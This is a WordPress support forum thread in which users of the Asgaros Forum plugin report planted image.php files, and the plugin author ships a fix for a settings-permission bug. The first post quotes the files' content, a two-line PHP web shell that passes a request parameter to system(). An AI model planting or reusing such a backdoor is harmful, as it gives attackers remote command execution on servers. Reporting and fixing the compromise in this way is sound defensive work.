Support » Plugin: Asgaros Forum » VaultPress New security threats found on androidsage.com

  • Resolved sarangsss29

    (@sarangsss29)


    Hi. I have been using Asgaros forums. And today, VaultPress (Primary official WordPress backup and security plugin) gave me security threat on the following location:

    uploads/asgarosforum/19/image.php
    uploads/asgarosforum/20/image.php
    uploads/asgarosforum/21/image.php

    There is a file called image.php which has a suspicious code:

    if (isset($_REQUEST[‘cmd’])) {
    @system($_REQUEST[‘cmd’]);
    }

    Please review it and let me know if it is safe and from Asgaros.

    • This topic was modified 3 months, 3 weeks ago by  sarangsss29.
    • This topic was modified 3 months, 3 weeks ago by  sarangsss29.
    • This topic was modified 3 months, 3 weeks ago by  Jan Dembowski.
Viewing 12 replies - 1 through 12 (of 12 total)
  • Hi @sarangsss29
    Delete the files( image.php) and temporarily close the attachment files. Win.Trojan…
    Check for suspicious server files

    • This reply was modified 3 months, 3 weeks ago by  Yworld.
    • This reply was modified 3 months, 3 weeks ago by  Yworld.

    Yesterday faced with the same problem. In addition to writing the specified file (which was destroyed by the antivirus server) the forum flew settings to permit all and all, as well as the skin fell back to the default. The impression that the settings were simply overwritten. On the forum in the topic with ID 1 there was a bunch of those with the name Test and the message Test with attachment image.php.

    However, in other sections of the site, no suspicious activity was observed.

    @drahtigel

    The impression that the settings were simply overwritten.

    Settings changes via the database

    Settings changes via the database

    Is it possible another way to change the settings, such as the execution of any script via vulnerability in WP or the forum? The fact that access to the database is closed from the outside. Directly to work with databases, need to be located on the server to know the prefix, know the password for the database.

    @yworld Thanks for the tip. Deleted the files. Let’s hope they don’t occur again. I am not sure whether it’s a third-party code injection or occurred by default from Asgaros.
    If it’s a trojan, how did it get in there?

    After deleting the files, the forum got to default settings as state by @drahtigel

    Thanks for all the help. What should I do next?

    @drahtigel
    Uploaded Shell and Backdoor

    @sarangsss29

    What should I do next?

    Wait a solution to the problem. If this is from Asgaros.
    It is unclear what plugin or WP

    • This reply was modified 3 months, 3 weeks ago by  Yworld.
    Plugin Author Asgaros

    (@asgaros)

    Hello everyone,

    thank you for this info. I will try to figure out what is going on.

    Plugin Author Asgaros

    (@asgaros)

    @sarangsss29
    @drahtigel
    @yworld

    I just released version 1.5.8 which should fix the bug that non-admin users could modify the settings of the forum. It could be possible that this bug allowed an attacker to modify the settings so that they could upload PHP files.

    Please install the latest version and give me feedback if those problems are gone. Sorry for the inconvenience! 🙁

    @asgaros Thank you!

    Yes. I believe the problem is gone. Thanks @asgaros

Viewing 12 replies - 1 through 12 (of 12 total)
  • You must be logged in to reply to this topic.